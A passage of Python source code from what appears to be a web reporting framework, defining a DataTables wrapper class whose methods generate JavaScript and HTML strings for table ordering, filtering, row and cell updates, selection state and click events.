self.addAttr('columns', self.__table.header)
self.addAttr('createdRow', "function(row, data, dataIndex) {%s}" % ";".join(self._jsRowFncs), isPyData=False)
columnOrders = [col['data'] for col in self.__table.header]
self.addAttr('aoColumnDefs', self._cols.toJs(), isPyData=False)
self.ctx = self.__table.js()
return '''
var table_data = {%(options)s};
if(typeof %(jsTableId)s === 'undefined'){
table_data.data = %(jsData)s;
%(jsTableId)s = $('#%(htmlId)s table').DataTable(table_data)}
else {
%(jsClear)s; %(jsTableId)s.rows.add(%(jsData)s); %(jsDraw)s;
} ''' % {'jsClear': self.jsClear(), 'jsTableId': self.jsTableId, 'jsDraw': self.jsDraw(), 'htmlId': self.htmlId,
'options': ", ".join(self.ctx), 'jsData': self.__table.data.setId(jsData).getJs()}
def ordering(self, orders):
"""
:category: Javascript - Datatable Table ordering
:rubric: JS
:example: myTable.orders( [('col1', 'desc'), ('col2', 'asc')] )
:example: tableObj.ordering(False)
:dsc:
Order the table according to the content of some defined columns.
Default behaviour will use the first column (visible or hidden) to order the table
:link Datatable Documentation: https://datatables.net/examples/basic_init/table_sorting.html
:return: self
"""
self.__table.ordering(orders)
return self
def selectRow(self, colName, jsValue, pyCssCls='CssTableSelected', isPyData=True):
"""
:category: Javascript - Datatable
:rubric: JS
:example: >>> myTable.selectRow( 'col1', 'test') ;
:dsc:
Function to set the selection of some row in the table.
The selection can be done on the javascript side but also in the init in the Python
:link Datatable Documentation:
"""
pyCss = self.cssSelection(pyCssCls)
if isPyData:
jsValue = json.dumps(jsValue)
self.__table.formatRow('''
if ( data['%(colName)s'] == %(value)s) {
$( row ).addClass( '%(pyCss)s' );
if ( DATATABLES_STATE['#%(htmlId)s'] == undefined ) { DATATABLES_STATE['#%(htmlId)s'] = [] } ;
DATATABLES_STATE['#%(htmlId)s'].push( {'row': JSON.stringify(data), row_id: index } );
} ''' % {"value": jsValue, 'colName': colName, 'htmlId': self.htmlId, 'jsTableId': self.jsTableId, 'pyCss': pyCss} )
def addButton(self, data):
"""
:category: Javascript - Datatable Initialisation
:rubric: JS
:example: >>> myTable.addButton( {'copy': 'Copy to clipboard' ] )
:dsc:
Display the generic buttons on the table of the table.
:link Datatable Documentation: https://datatables.net/extensions/buttons/
:link Datatable Documentation 2: https://datatables.net/reference/option/buttons.buttons.text
"""
self.__table['buttons'].append({})
for key, val in data.items():
self.__table.addAttr(key, val, ('buttons', -1))
# -----------------------------------------------------------------------------------------
# Generic Python function to the attribute tables
# -----------------------------------------------------------------------------------------
def addAttr(self, key, val=None, category=None, isPyData=True):
"""
:category: Table Definition
:rubric: PY
:type: Configuration
:dsc:
Add parameters to the Datatable definition before buidling it.
:link Datatable Documentation: https://datatables.net/manual/styling/
:return: Python Object
"""
if isinstance(key, dict):
for k, v in key.items():
self.__table.addAttr(k, v, category, isPyData)
else:
self.__table.addAttr(key, val, category, isPyData)
return self
def delAttr(self, key, category=None):
"""
:category: Table Definition
:rubric: PY
:type: Configuration
:dsc:
Add parameters to the Datatable definition before buidling it.
:link Datatable Documentation: https://datatables.net/manual/styling/
:return: Python Object
"""
self.__table.delAttr(key, category)
return self
# -----------------------------------------------------------------------------------------
# STANDARD DATATABLE JAVASCRIPT
# -----------------------------------------------------------------------------------------
def jsDataRow(self, jsData='data', jsDataKey=None, isPyData=False):
"""
:category: Python - Datatable Data conversion
:rubric: PY
:example: >>> myTable.jsDataRow()
:example: >>> myTable.jsFilterCol('Product', jsData=t.jsDataRow(), jsDataKey='Product')
:dsc:
This function will change the data object used in the event to be the row directly as a dictionary.
:tip: You can use this in jsData to replace the data in the function like jsFilterCol
:return: Returns a string as a javascript dictionary with the row data as a dictionary
"""
if isPyData:
jsData = json.dumps(jsData)
if jsDataKey is not None:
jsData = "%s.%s" % (jsData, jsDataKey)
return "JSON.parse(%s.row)" % jsData
def jsFilterCol(self, colName, jsData='data', jsDataKey=None, isPyData=False):
"""
:category: Javascript - Datatable Filter
:rubric: JS
:example: >>> myTable.jsFilterCol('Product', jsData=t.jsDataRow(), jsDataKey='Product')
:TODO: Extend this method to filter on multiple columns
:dsc:
Filtering function on the datatable based on external rules. This will use the internal Datatable engine to filter the data
:tip: Use the function to replace the jsData to be the row using jsDataRow() to filter on another table click row event
:return: Return a string corresponding to the filtering function on the table
:link Datatable Documentation: https://datatables.net/reference/api/search()
"""
for i, col in enumerate(self.__table.header):
if col['data'] == colName:
colIndex = i
break
else:
return ''
if isPyData:
jsData = json.dumps(jsData)
else:
if jsDataKey is not None:
jsData = "%s['%s']" % (jsData, jsDataKey)
self.addAttr('searching', True)
return '''%(jsTableId)s.column( [%(colIndex)s] ).search( %(jsData)s ).draw();''' % {'jsTableId': self.jsTableId, 'colIndex': colIndex, 'jsData': jsData}
def jsFilterFromCell(self):
"""
:category: Javascript - Datatable Filter
:rubric: JS
:example: >>> myTable.jsFilterFromCell()
:TODO: Extend this method to filter on multiple columns
:dsc:
Filtering function on the datatable based on an external cell object. This will use the internal Datatable engine to filter the data
:return: Return a string corresponding to the filtering function on the table
:link Datatable Documentation: https://datatables.net/reference/api/search()
"""
self.addAttr('searching', True)
return '''%(jsTableId)s.columns().search('').draw();%(jsTableId)s.column( [data.col_id] ).search( data.cell ).draw(); ''' % {'jsTableId': self.jsTableId}
def jsClear(self, update=False):
"""
:category: Javascript - Datatable Refresh
:rubric: JS
:type: Table Event
:example: myTable.jsClear()
:dsc:
Function to clear the content of a table. The table will still be present but only with the headers.
It will be then possible to add rows to this table as long as the expected keys are presented in the dictionary
:link Datatable website: https://datatables.net/reference/api/clear()
"""
updateFnc = self.jsDraw() if update else ""
return "%(jsTableId)s.clear();%(jsDraw)s" % {'jsTableId': self.jsTableId, "jsDraw": updateFnc}
def jsDraw(self, scope=None):
"""
:category: Javascript - Datatable Refresh
:rubric: JS
:type: Table Event
:example: >>> myTable.jsDraw() ;
:dsc:
Function on the javascript side to force a table to be refreshed. This can be triggered in a javascript event
or after a change but on the javascript side
:link Datatable website: https://datatables.net/reference/api/draw()
"""
if scope is None:
return "%(jsTableId)s.draw()" % {'jsTableId': self.jsTableId}
return "%(jsTableId)s.draw(%(scope)s)" % {'jsTableId': self.jsTableId, 'scope': json.dumps(scope)}
def jsRemoveRow(self, jsData="$(this).parents('tr')", jsDataKey=None, update=True, isPyData=False):
"""
:category: Javascript - Datatable Refresh
:rubric: JS
:type: Table Event
:example: >>> myTable.jsRemoveRow() ;
:example: >>> click(myTable.jsRemoveRow(1)) ;
:dsc:
Function to remove the selected row. This function should be triggered only in a row click event as the this (self)
object is used.
:link Datatable website: https://datatables.net/reference/api/row()
"""
if isPyData:
jsData = json.dumps(jsData)
if jsDataKey is not None:
jsData = "%s.%s" % (jsData, jsDataKey)
updateFnc = self.jsDraw('page') if update else ""
return "var row = %(jsTableId)s.row(%(rowIdx)s); var rowNode = row.node(); row.remove();%(jsDraw)s" % {"rowIdx": jsData, 'jsTableId': self.jsTableId, "jsDraw": updateFnc}
def jsUpdateCell(self, jsData='data', jsDataKey='cell', isPyData=False, update=True):
"""
:category: Javascript - Datatable Refresh
:rubric: JS
:example: >>> myTable.jsUpdateCell() ;
:example: >>> myTable.jsUpdateCell( jsData= {'cell': ["A", "B"], 'col_id': 1, 'row_id': 1 }, isPyData=True) ;
:dsc:
Function to update the value of a cell. Can be the current one or another.
This information should be defined in the jsDataKey object.
:link Datatable website: https://datatables.net/reference/api/cell()
"""
if isPyData:
jsData = json.dumps(jsData)
updateFnc = self.jsDraw('page') if update else ""
return "%(jsTableId)s.cell( %(jsData)s['row_id'], %(jsData)s['col_id'] ).data(%(jsData)s['%(cell)s']);%(jsDraw)s" % {'jsTableId': self.jsTableId, 'jsData': jsData, 'cell': jsDataKey, "jsDraw": updateFnc}
def jsCellGoTo(self, url=None, jsData='data', jsDataKey='cell', jsCellCode='cell', isPyData=False):
"""
:category: Javascript function
:rubric: JS
:type: Cell event
:example: >>> myObj.jsCellGoTo( 'http://www.google.fr' )
:dsc:
The href property sets or returns the entire URL of the current page.
:return: A string representing the Javascript fragment to be added to the page to go to another web page
:link W3C Documentation: https://www.w3schools.com/jsref/prop_loc_href.asp
"""
if isPyData:
jsData = json.dumps(jsData)
if url is None:
return "%s;location.href=buildBreadCrum();" % self.jsAddUrlParam(jsCellCode, "%s.%s" %(jsData, jsDataKey), isPyData=False)
return 'window.location.href="%s?%s=" + %s;' % (url, jsCellCode, "%s.%s" %(jsData, jsDataKey))
def jsUpdateRow(self, jsData='data', jsDataKey='row', isPyData=False, update=True):
"""
:category: Javascript - Datatable Refresh
:rubric: JS
:example: >>> myTable.jsUpdateRow() ;
:example: >>> myTable.jsUpdateCell( jsData= {'row': ["A", "B"], 'row_id': 1 }, isPyData=True) ;
:dsc:
Function to update a row in a table. This can work very well with a clickRow event as the object will already have the
expected format. So by returning from a ajax call from this kind of data and calling this function the source row will be changed
:link Datatable website: https://datatables.net/reference/api/row()
"""
if isPyData:
jsData = json.dumps(jsData)
updateFnc = self.jsDraw('page') if update else ""
return "%(jsTableId)s.row( %(jsData)s['row_id']).data( %(jsData)s['%(jsDataKey)s']);%(jsDraw)s" % {'jsTableId': self.jsTableId, 'jsData': jsData, 'jsDataKey': jsDataKey, "jsDraw": updateFnc}
def jsAddRow(self, jsData='data', uniqKey=None, jsDataKey=None, pyCssCls='CssTableNewRow', isPyData=False):
"""
:category: Javascript - Datatable Refresh
:rubric: JS
:type: Table Event
:example: >>> myTable.jsAddRow()
:example: >>> .click(myTable.jsAddRow([{'direction': 'test', 'dn': -11}], isPyData=True))
:example: >>> myTable.jsAddRow( [{}], isPyData=True )
:dsc:
Function to add a row to a table. This will use the internal Javascript data object generated automatically from the event.
Even a service call will return a data object as a dictionary. The jsDataKey is the key in the data dictionary where the
relevant row information are.
:link Datatable website: https://datatables.net/reference/api/row()
"""
if pyCssCls == 'CssTableNewRow':
# Add the class to the Python factory and create the reference to it
pyCssCls = self.addPyCss(pyCssCls)
if isPyData:
jsData = json.dumps(jsData)
return '''
var uniqKeys = %(uniqKey)s ; var rows = %(rows)s; var keys = {} ;
if (%(jsDataKey)s != null) { rows = rows[%(jsDataKey)s] ;};
if (uniqKeys != null) {
rows.forEach( function(rec) {
var newKey = [] ; uniqKeys.forEach( function(code) { newKey.push( rec[code] ) ; }) ;
keys[ newKey.join('#') ] = true ; }) ;
var rowToBeDeleted = -1;
%(jsTableId)s.rows().every( function ( rowIdx, tableLoop, rowLoop ) {
var data = this.data();
var newKey = [] ; uniqKeys.forEach( function(code) { newKey.push( data[code] ) ; }) ;
if ( newKey in keys) { rowToBeDeleted = rowIdx; } } );
if (rowToBeDeleted != -1) { %(jsTableId)s.row( rowToBeDeleted ).remove().draw() } ; }
%(jsTableId)s.rows.add( rows ).draw().nodes().to$().addClass( '%(pyCssCls)s' ); %(extraJsInitFnc)s;
if (typeof data != 'undefined') { data.uniqKeys = uniqKeys; data.row = JSON.stringify(%(rows)s) ; };
''' % {'jsTableId': self.jsTableId, 'uniqKey': json.dumps(uniqKey), 'rows': jsData, 'pyCssCls': pyCssCls,
'jsDataKey': json.dumps(jsDataKey), 'extraJsInitFnc': ";".join(self.extraJsInitFnc)}
#
# def jsLoadFromSrc(self, jsDataKey=None):
# return '''
# $('#%(htmlId)s_loading_icon').show() ; $('#%(htmlId)s').hide(); $('#%(htmlId)s_loading').show();
# %(ajax)s ;
# ''' % {"ajax": self.aresObj.jsPost(self.dataSrc['script'], jsData=self.dataSrc.get('htmlObjs'), htmlCodes=self.dataSrc.get('htmlCodes'),
# jsFnc=["$('#%(htmlId)s').show(); $('#%(htmlId)s_loading').hide(); $('#%(htmlId)s_loading_icon').hide() ; " % {"htmlId": self.htmlId},
# self.jsLoad('data', jsDataKey=jsDataKey), self.jsLastUpdate()] ),
# 'htmlId': self.htmlId}
def jsSetRowSelected(self, colNames, jsValue='data.row', jsDataKey=None, isPyData=False, pyCssCls='CssTableSelected'):
"""
:category: Javascript - Datatable Selections
:rubric: JS
:type: Table Event
:example: >>> click(tb.jsSetRowSelected(['direction'], {'direction': 'Increasing'}, isPyData=True))
:example: >>> button.click(t3.jsSetRowSelected(["C"], {"C": 1}, isPyData=True))
:dsc:
Force the row selection based on a list of value per columns in the table.
this event should be defined in a Javascript event but as usual parameters can be both Javascript and Python.
:tip: You can get hold of the selected row at any point of time in the Javascript by using jsClickState() in a js Event
:return: The javascript fragment to select the matching rows and unselect the rest
"""
pyCss = self.cssSelection(pyCssCls)
if isPyData:
jsValue = json.dumps(jsValue)
if jsValue == 'data.row':
jsValue = "JSON.parse(%s)" % jsValue
if jsDataKey is not None:
# Here we do not consider the default value of the jsValue as this is coming from jsDataKey
jsValue = "data['%s']" % jsDataKey
return '''
if (DATATABLES_STATE['#%(htmlId)s'] != undefined) {
DATATABLES_STATE['#%(htmlId)s'].forEach( function(rec) {$(%(jsTableId)s.row(rec.row_id).node()).removeClass('%(pyCss)s')})} ;
DATATABLES_STATE['#%(htmlId)s'] = [] ;
%(jsTableId)s.rows().every( function (rowIdx, tableLoop, rowLoop) {
var dataRow = this.data(); var isSelected = true; console.log(dataRow);
%(colName)s.forEach( function(col) {if (dataRow[col] != %(jsValue)s[col] ) {isSelected = false}});
if (isSelected) {
$( %(jsTableId)s.row(rowIdx).node() ).addClass( '%(pyCss)s' );
DATATABLES_STATE['#%(htmlId)s'].push( {row: JSON.stringify(%(jsTableId)s.rows( $(this) ).data()[0]), row_id: %(jsTableId)s.row( $(this) ).index() } )
}})''' % {'jsTableId': self.jsTableId, 'colName': json.dumps(colNames), 'jsValue': jsValue, 'htmlId': self.htmlId, 'pyCss': pyCss}
def jsDestroy(self):
"""
:category: Javascript - Datatable Refresh
:rubric: JS
:type: Table Event
:example: >>> myTable.jsDetroy() ;
:dsc:
Function to fully detroy the table definition. once this function is trigger there is no definition at all of this object and the
datatable needs to be fully redefined (with the column headers, the styles...)
:return: The javascript string fragment to destroy the table
:link Datatable Documentation: https://datatables.net/reference/api/destroy()
"""
return "%s.destroy()" % self.jsTableId
def jsGetData(self):
"""
:category: Javascript - Datatable Data Retrieval
:rubric: JS
:example: >>> myTable.jsGetData() ;
:dsc:
Function to get the datatable data in a table
:return: The javascript string fragment to destroy the table
"""
return 'GetTableData(%s)' % self.jsTableId
def jsGetSize(self):
"""
:category: Javascript function
:rubric: JS
:type: Table Event
:example: >>> myTable.jsGetSize() ;
:dsc:
Function to get the number of rows in the javascript side
:return: The Javascript string function to get the number of rows as an integer
"""
return '%s.rows().data().length' % self.jsTableId
def jsGetRow(self, jsData='data', jsDataKey=None, isPyData=False):
"""
:category: Javascript function
:rubric: JS
:type: Table Event
:example: >>> myTable.jsGetRow( 1, isPyData=True ) ;
:dsc:
Function to get the row in the datatable from the row ID
:return: The Javascript string function to get the row as an javascript Array
"""
if isPyData:
jsData = json.dumps(jsData)
if jsDataKey is not None:
jsData = "%s.%s" % (jsData, jsDataKey)
return '%s.rows().data()[%s]' % (self.jsTableId, jsData)
def jsGetCol(self, jsData='data', jsDataKey=None, removeDuplicate=True, isPyData=False):
"""
:category: Javascript function
:rubric: JS
:type: Table Event
:example: >>> click(aresObj.jsConsole(tb.jsGetCol('direction', isPyData=True)))
:dsc:
Function to get the column in the datatable from the column name.
This will return a list with the distinct values or the full column.
By default distinct values are removed
:return: The Javascript string function to get the column as an javascript Array
"""
if isPyData:
jsData = json.dumps(jsData)
if jsDataKey is not None:
jsData = "%s.%s" % (jsData, jsDataKey)
return ''' function(){
var columnName = %(jsData)s; var columnNames = [];
%(jsTableId)s.settings().context[0].aoColumns.forEach(function(col){columnNames.push(col.data)});
return %(jsTableId)s.column(columnNames.indexOf(columnName)).data().toArray()%(uniqueVals)s}()
''' % {'jsData': jsData, 'jsTableId': self.jsTableId, 'uniqueVals': '.unique()' if removeDuplicate else ''}
# -----------------------------------------------------------------------------------------
# ADD SYSTEM EVENT COLUMNS
# -----------------------------------------------------------------------------------------
# def addEventCol(self, icon, jsEvent, eventName=None, tooltip=''):
# if isinstance(jsEvent, list):
# jsEvent = ";".join(jsEvent)
# pyCssCls = self.addPyCss('CssTableColumnSystem')
# colReference = icon.replace(" ", "").replace("-", '') if eventName is None else eventName
# self.__table.header.append({'data': colReference, 'className': '%s %s' % (pyCssCls, colReference), 'title': '<div class=\'%s\'></div>' % icon, 'width': '5px',
# 'dsc': tooltip, 'format': '"<div name=\'%s\' title=\'%s\' style=\'cursor:pointer\' class=\'%s\'></div>"' % (self.htmlId, tooltip, icon)})
# self.aresObj.jsOnLoadFnc.add('''
# $(document).on('click', '.%(colReference)s', function() {
# var jsTableId = window[$(this).find('div').attr('name') + '_table'];
# var data = {row: JSON.stringify(jsTableId.rows( $(this) ).data()[0]), row_id: jsTableId.row( $(this) ).index(), event: '%(colReference)s' } ;
# %(jsPost)s}) ''' % {"colReference": colReference, 'jsPost': jsEvent, 'pyCssCls': pyCssCls })
# return self
#
# def addColDelete(self, deleteCol):
# pyCssCls = self.addPyCss('CssTableColumnSystem')
# self.__table.header.append({'data': '_delete', 'className': '%s delete_%s' % (pyCssCls, self.htmlId), 'title': '<div class=\'far fa-trash-alt\'></div>', 'width': '5px',
# 'format': '"<div id=\'delete\' name=\'%s\' title=\'Delete Row\' style=\'cursor:pointer\' class=\'far fa-trash-alt\'></div>"' % self.htmlId})
#
# jsPost = self.aresObj.jsPost(deleteCol['url'], None, deleteCol.get('success', ''), htmlCodes=deleteCol.get('htmlCodes')) if isinstance(deleteCol, dict) else ''
# self.aresObj.jsOnLoadFnc.add('''
# $( document ).on('click', '.delete_%(htmlId)s', function() {
# if ($(this).find('div').attr('id') == 'delete') {
# var jsTableId = window[$(this).find('div').attr('name') + '_table'];
# var data = {row: JSON.stringify(jsTableId.rows( $(this) ).data()[0]), row_id: jsTableId.row( $(this) ).index(), event: 'delete' } ;
# jsTableId.row( $(this).parents() ).remove().draw('page');
# %(jsPost)s } }) ''' % {"deleteCls": pyCssCls, 'jsPost': jsPost, 'htmlId': self.htmlId})
# return self
#
# def addColSave(self, saveRow):
# self.addGlobalVar("%s_changed" % self.jsTableId, "true")
# pyCssCls = self.addPyCss('CssTableColumnSystem')
# self.__table.header.append({'data': '_save', 'className': '%s save_%s' % (pyCssCls, self.htmlId), 'title': '<div class=\'fas fa-check\'></div>', 'width': '5px',
# 'dsc': 'Click on the icon to save the row',
# 'format': '"<div id=\'save\' name=\'%s\' title=\'Save Row\' style=\'cursor:pointer;display:none\' class=\'fas fa-check\'></div>"' % self.htmlId})
#
# jsPost = self.aresObj.jsPost(saveRow['url'], None, saveRow.get('success', ''), htmlCodes=saveRow.get('htmlCodes')) if 'url' in saveRow else ''
# self.aresObj.jsOnLoadFnc.add('''
# $( document ).on('click', '.save_%(htmlId)s', function() {
# if ($(this).find('div').css('display') != 'none' ) {
# var jsTableId = window[$(this).find('div').attr('name') + '_table'];
# var data = {row: JSON.stringify(jsTableId.rows( $(this) ).data()[0]), row_id: jsTableId.row( $(this) ).index(), event: 'save' } ;
# %(jsPost)s; $(this).find('div').css('display', 'none'); } }) ''' % {"deleteCls": pyCssCls, 'jsPost': jsPost, 'htmlId': self.htmlId})
# return self
def setHeader(self, extraHeaders=None, cssClsStyles=None, cssClsHeader=None):
"""
:category: Table Definition
:rubric: HTML
:type: Style
:dsc:
Add an extra layer on top of the header
:example:
tb.setHeader([
[{'value': 'a', 'cols': 3, 'rows': 2}, {'value': 'b', 'cols': 3, 'rows': 1}],
[{'value': 'd', 'cols': 3, 'rows': 1}]])
:return: The Python Datatable object
"""
headers = []
if extraHeaders is not None:
for i, h in enumerate(extraHeaders):
tr = '<tr>'
if cssClsStyles is not None:
if isinstance(cssClsStyles, list):
if cssClsStyles[i] is not None:
tr = '<tr class="%s">' % cssClsStyles[i]
else:
tr = '<tr class="%s">' % cssClsStyles
print(tr)
headers.append("%s%s</tr>" % (tr, "".join(["<th colspan='%s' title='%s' rowspan='%s'>%s</th>" % (v.get('cols', 1), v.get('title', ''), v.get('rows', 1), v['value']) for v in h])))
if cssClsHeader is not None and self.aresObj.cssObj.get(cssClsHeader) is not None:
self.addPyCss(cssClsHeader)
headers.append("<tr class='%s'>%s</tr>" % (self.aresObj.cssObj.get(cssClsHeader)().classname, "".join(["<th>%s</th>" % h['title'] for h in self.__table.header])))
else:
headers.append("<tr>%s</tr>" % "".join(["<th class='%s'>%s</th>" % (h['title'], h.get('class')) for h in self.__table.header]))
self.header = "<thead>%(headers)s</thead>" % {'headers': "".join(headers)}
return self
def setFooter(self, row):
"""
:category: Table Definition
:rubric: HTML
:type: Style
:dsc:
Add a footer to the table
:example:
tb.setFooter(['', '', 0, 1, 2, 3, 4])
:return: The Python Datatable object
"""
titles = ['<th>%s</th>' % (h['value'] if isinstance(h, dict) else h) for h in row]
self.footer = '<tfoot><tr>%(columns)s</tr></tfoot>' % {'columns': "".join(titles)}
return self
def setTableCss(self, cssClss):
"""
:category: Table Definition
:rubric: CSS
:type: Style
:dsc:
Add a style to the datatable. This can be used to change some specific part of the table (for example the header)
:example:
class CssTableHeader(object):
__style = [{'attr': 'background', 'value': 'grey'}]
childrenTag = 'th'
tb.setTableCss(CssTableHeader)
:return: The Python Datatable object
"""
import inspect
if not isinstance(cssClss, list):
cssClss = [cssClss]
for cssCls in cssClss:
if inspect.isclass(cssCls):
self.aresObj.cssObj.addPy(cssCls)
cssCls = cssCls.__name__
clssMod = self.aresObj.cssObj.get(cssCls)
if clssMod is not None:
self.addPyCss(cssCls)
self.tableStyle.append(clssMod().classname)
return self
# -----------------------------------------------------------------------------------------
# JAVASCRIPT CLICK EVENTS
# -----------------------------------------------------------------------------------------
# TODO finalise event on col and Row
# TODO Add the global filtering aspect
# TODO Add the possibility to add or remove columns on demand
def jsClickState(self, htmlId=None):
"""
:category: Javascript Event
:rubric: JS
:example: myObj.jsClickState()
:dsc:
Python function to return the javascript state of a table (the selected information)
:return: Javascript list with the selected data
"""
if htmlId is None:
return "DATATABLES_STATE['#%(htmlId)s']" % {'htmlId': self.htmlId}
return "DATATABLES_STATE"
def clickRow(self, jsFncs, rowIndices=None, pyCssCls='CssTableSelected'):
"""
:category: Javascript Event
:rubric: JS
:type: Table Event
:example: >>> tableObj.clickRow( aresObj.jsConsole() )
:dsc:
:return: Javascript String of the variable used to defined the Jquery object in Javascript
"""
self.cssSelection(pyCssCls)
if not isinstance(jsFncs, list):
jsFncs = [jsFncs]
self.clickCell(jsFncs, rowIndices=rowIndices)
return self
# self.aresObj.jsOnLoadFnc.add('''
# $('#%(htmlId)s').css( 'cursor', 'pointer') ;
# $('#%(htmlId)s').on('click', '%(eventSrc)s', function () {
# var loading = $("<div style='position:fixed;background:white;padding:5px;z-index:10;bottom:20px;left:60px;color:black' id='cell_loading'><i class='fas fa-spinner fa-spin'></i> Loading...</div>" ) ;
# $(this).append(loading) ; var useAsync = false ;
# if ( DATATABLES_STATE['#%(htmlId)s'] != undefined ) {
# DATATABLES_STATE['#%(htmlId)s'].forEach( function (rec) {
# $(%(jsTableId)s.row(rec.row_id).node()).removeClass( '%(pyCss)s' );
# $( %(jsTableId)s.row(rec.row_id).node()).find('td').each (function() {
# $(this).css( {"background-color": $(this).data("background") } ) ; }) ;
# } ) } ;
# DATATABLES_STATE['#%(htmlId)s'] = [] ;
# var data = {row: JSON.stringify(%(jsTableId)s.rows( $(this) ).data()[0]), row_id: %(jsTableId)s.row( $(this) ).index() } ;
# DATATABLES_STATE['#%(htmlId)s'].push( data );
#
# $( %(jsTableId)s.row(data.row_id).node()).find('td').each (function() {
# $(this).data("background", $(this).css("background-color") ) ;
# $(this).css( {"background-color": ""} ) ;
# }) ;
#
# $( %(jsTableId)s.row(data.row_id).node() ).addClass( '%(pyCss)s' );
# %(jsFncs)s ; %(jsTableId)s.draw('page') ;
# if (!useAsync) { loading.hide() ; }} );
# ''' % {'htmlId': self.htmlId, 'jsTableId': self.jsTableId, 'jsFncs': ";".join(jsFncs), 'eventSrc': eventSrc, 'pyCss': pyCss} )
def clickCol(self, jsFncs, colIndices=None, colNames=None):
"""
:category: Javascript Event
:rubric: JS
:type: Table Event
:example: tableObj.clickCol( aresObj.jsConsole() )
:example: tableObj.clickCol( aresObj.jsConsole(), ['col1'] )
:dsc:
Function to add a click event on columns. If the variable colNames is not defined with a list of columns
the framework will assume that the event should be applied on all the columns of the table
:Tip: You can get the selected column by using the function jsClickState in a javascript Event function
:return: The Javascript Fragment to enable the click on columns
"""
if not isinstance(jsFncs, list):
jsFncs = [jsFncs]
if not isinstance(colNames, list):
colNames = [colNames]
if colNames is not None:
colIds = [self.columns.index(colName) for colName in colNames]
if colIndices is not None:
colIndices += colIds
else:
colIndices = colIds
self.clickCell(jsFncs, colIndices=colIndices)
return self
def clickCell(self, jsFncs, rowIndices=None, colIndices=None, colorSelected=True, pyCssCls='CssTableSelected'):
"""
:category: Javascript Event
:rubric: JS
:type: Table Event
:example: >>> t2.clickCell( aresObj.jsPost("BarChartData.py", jsFnc=barChart.jsGenerate() ) )
:dsc:
Function to add a click event on each cell in the table. It is possible to limit on some columns and row by using the
variable rowIndex and colIndex
:link Datatable Documentation: https://datatables.net/forums/discussion/46445/get-column-name-by-index
:return: The Javascript Fragment to enable the click on columns
"""
if colIndices is not None and not isinstance(colIndices, list):
colIndices = [colIndices]
if rowIndices is not None and not isinstance(rowIndices, list):
rowIndices = [rowIndices]
if not isinstance(jsFncs, list):
jsFncs = [jsFncs]
pyCss = self.cssSelection(pyCssCls)
pyCssSystemCls = self.getPyCss('CssTableColumnSystem')
self.aresObj.jsOnLoadFnc.add('''
$('#%(htmlId)s').css('cursor', 'pointer');
$('#%(htmlId)s').on('click', 'td:not(.%(pyCssDeleteCls)s)', function () {
var isValid = true;
if((%(rowIndex)s != null) && ( %(rowIndex)s.indexOf(%(jsTableId)s.cell($(this)).index().row)) < 0) {isValid = false};
if((%(colIndex)s != null) && ( %(colIndex)s.indexOf(%(jsTableId)s.cell($(this)).index().column)) < 0) {isValid = false};
if (isValid) {
var loading = $("<div style='position:fixed;background:white;padding:5px;z-index:10;bottom:20px;left:60px;color:black' id='cell_loading'><i class='fas fa-spinner fa-spin'></i> Loading...</div>" ) ;
$(this).append(loading); var useAsync = false;
if (DATATABLES_STATE['#%(htmlId)s'] != undefined) {
DATATABLES_STATE['#%(htmlId)s'].forEach(function (rec) {
$(%(jsTableId)s.cell(rec.row_id, rec.col_id).node()).removeClass('%(pyCss)s')})};
var data = {cell: %(jsTableId)s.cell($(this)).data(), row: JSON.stringify(%(jsTableId)s.rows($(this)).data()[0]),
row_id: %(jsTableId)s.cell($(this)).index().row, col_id: %(jsTableId)s.cell($(this)).index().column,
col_name: %(jsTableId)s.settings().init().columns[%(jsTableId)s.cell($(this)).index().column].title};
DATATABLES_STATE['#%(htmlId)s'] = [data];
if (%(colorSelected)s) {$(%(jsTableId)s.cell(data.row_id, data.col_id).node()).addClass('%(pyCss)s')}
%(jsFncs)s; %(jsTableId)s.draw('page');
if (!useAsync) {loading.hide()}}
});
''' % {'pyCssDeleteCls': pyCssSystemCls, 'htmlId': self.htmlId, 'jsTableId': self.jsTableId, 'jsFncs': ";".join(jsFncs),
'rowIndex': json.dumps(rowIndices), 'colIndex': json.dumps(colIndices), 'colorSelected': json.dumps(colorSelected), 'pyCss': pyCss})
# -----------------------------------------------------------------------------------------
# TABLE EXPORT OPTIONS
# -----------------------------------------------------------------------------------------
def __str__(self):
# # self.addGlobalFnc("GetTableData(tableObj)", '''
# # result = [] ;
# # var data = tableObj.rows().data() ;
# # for(var i = 0; i < data.data().length ; i++) { result.push(data[i]) ; }; return result; ''',
# # 'Function to get in an Array the content of a Datatable')
# # options = []
# # if self.addCol is not None:
# # plus = self.aresObj.plus()
# # row = []
# # for code, htmlObj in self.addCol.get('htmlObj', {}).items():
# # row.append( '"%s": %s' % (code, htmlObj.val))
# # for code, vals in self.addCol.get('default', {}).items():
# # row.append( '"%s": %s' % (code, json.dumps(vals) ))
# # row.append( 'last_mod_dt : Today()')
# # self.addGlobalVar('%s_default_row' % self.jsTableId, '[ {%s} ]' % ','.join(row) )
# # plus.click( self.jsAddRow( jsData="window['%s_default_row']" % self.jsTableId, uniqKey=self.addCol.get('uniqKey') ) )
# # options.append(plus.html())
# # if self.calculator:
# # options.append(self.aresObj.calculator(self.jqId).html())
# # if self.refresh:
# # if self.dataSrc is not None and self.dataSrc['type'] == 'script':
# # r = self.aresObj.refresh()
# # r.click(self.jsLoadFromSrc(self.dataSrc.get('jsDataKey')))
# # options.append(r.html())
# # if self.comment:
# # t = self.aresObj.thumbtack(self.jqId)
# # options.append(t.html())
# # if self.download:
# # copy = self.aresObj.upButton()
# # copy.click("%s.buttons('.buttons-copy').trigger();" % self.jsTableId)
# # options.append(copy.html())
# # if self.pdf:
# # pdf = self.aresObj.pdf()
# # pdf.click(["%s.buttons('.buttons-pdf').trigger();" % self.jsTableId])
# # options.append(pdf.html())
# # if self.excel:
# # excel = self.aresObj.excel()
# # excel.click("%s.buttons('.buttons-excel').trigger();" % self.jsTableId)
# # options.append(excel.html())
# # if self.magnify:
# # zoom = self.aresObj.zoom()
# # zoom.click( '''
# # if ( $('#%(htmlId)s').css('position') != 'fixed' ) {
# # $('#%(htmlId)s').css( {'position': 'fixed', 'top': 0, 'left':0, 'background-color': 'white', 'height': '100%%', 'width': '100%%', 'z-index': 1300} );
# # } else {
# # $('#%(htmlId)s').css( {'position': 'relative' , 'z-index': 1} ); }
# # %(jsTableId)s.draw() ;
# # ''' % { 'htmlId': self.htmlId, 'jsTableId': self.jsTableId } )
# # options.append(zoom.html())
# # #remove = self.aresObj.remove()
# # #remove.click([self.jsRemove()])
# # #options.append(remove.html())
return '''
